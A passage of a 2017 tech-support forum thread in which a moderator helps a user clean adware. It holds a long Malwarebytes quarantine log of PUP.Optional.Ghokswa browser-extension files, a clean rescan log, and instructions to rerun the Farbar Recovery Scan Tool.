    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\en_GB, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\en_US, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\pt_BR, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\pt_BR, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\en_GB, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\macromedia.com, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\zh_TW, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\en_US, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fil, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\pt_PT, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\bg, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_metadata, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ca, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\cs, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\da, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\de, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\el, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\en, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\es, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sk, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fi, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fr, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\lv, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\nl, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\no, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pl, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hi, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hr, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ro, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ru, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ar, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sl, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sr, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sv, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\th, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\tr, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\uk, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\vi, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hu, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\id, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\he, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\fil, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\it, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\www.iqiyi.com, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ja, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ko, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\lt, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ar, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\da, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\sl, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\fil, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\fil, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\fil, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\fil, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ro, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ru, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\sk, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\sr, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\es, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\sv, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\et, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\eu, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\fi, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\th, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\tr, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\fr, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\uk, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\he, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\hi, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\vi, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\el, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\cs, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\hr, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\bg, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\id, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\fil, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\it, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ja, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ko, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\lt, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\lv, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ms, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\nl, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\no, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\pl, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ca, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\de, Quarantined, [27], [325136],1.0.1506
     
  18. 2017/03/19
    scgoh123

    scgoh123 Well-Known Member Thread Starter

    Joined:
    2009/09/04
    Messages:
    352
    Likes Received:
    2
    Trophy Points:
    233
    Location:
    Singapore
    Computer Experience:
    Still Improving
    ...but I noticed that the MBAM log is too long (around 1210 pages in Microsoft Word). I will attach as notepad txt file because it's practically impossible and copy and paste parts and parts. Really sorry.

    Malwarebytes.docx
     
  19. 2017/03/19
    broni

    broni Moderator Malware Analyst

    Joined:
    2002/08/01
    Messages:
    21,483
    Likes Received:
    103
    Trophy Points:
    843
    Location:
    Daly City, CA
    Computer Experience:
    Experienced
    Please re-run MBAM one more time and post fresh log.
    I want to make sure it removed everything.
     
  20. 2017/03/20
    scgoh123

    scgoh123 Well-Known Member Thread Starter

    Joined:
    2009/09/04
    Messages:
    352
    Likes Received:
    2
    Trophy Points:
    233
    Location:
    Singapore
    Computer Experience:
    Still Improving
    Malwarebytes
    www.malwarebytes.com

    -Log Details-
    Scan Date: 3/21/17
    Scan Time: 8:03 AM
    Logfile: gvh.txt
    Administrator: Yes

    -Software Information-
    Version: 3.0.6.1469
    Components Version: 1.0.75
    Update Package Version: 1.0.1550
    License: Trial

    -System Information-
    OS: Windows 8.1
    CPU: x64
    File System: NTFS
    User: ASUS\User

    -Scan Summary-
    Scan Type: Threat Scan
    Result: Completed
    Objects Scanned: 433817
    Time Elapsed: 10 min, 49 sec

    -Scan Options-
    Memory: Enabled
    Startup: Enabled
    Filesystem: Enabled
    Archives: Enabled
    Rootkits: Disabled
    Heuristics: Enabled
    PUP: Enabled
    PUM: Enabled

    -Scan Details-
    Process: 0
    (No malicious items detected)

    Module: 0
    (No malicious items detected)

    Registry Key: 0
    (No malicious items detected)

    Registry Value: 0
    (No malicious items detected)

    Registry Data: 0
    (No malicious items detected)

    Data Stream: 0
    (No malicious items detected)

    Folder: 0
    (No malicious items detected)

    File: 0
    (No malicious items detected)

    Physical Sector: 0
    (No malicious items detected)


    (end)
     
  21. 2017/03/20
    broni

    broni Moderator Malware Analyst

    Joined:
    2002/08/01
    Messages:
    21,483
    Likes Received:
    103
    Trophy Points:
    843
    Location:
    Daly City, CA
    Computer Experience:
    Experienced
    Good :)

    Re-run Farbar Recovery Scan Tool (FRST/FRST64) you ran at the very beginning of this topic.

    • Double click to run it.
    • Make sure you checkmark Addition.txt box.
    • Press Scan button.
    • Scan will create two logs, FRST.txt and Addition.txt in the same directory the tool is run. Please copy and paste them to your reply.
     

Share This Page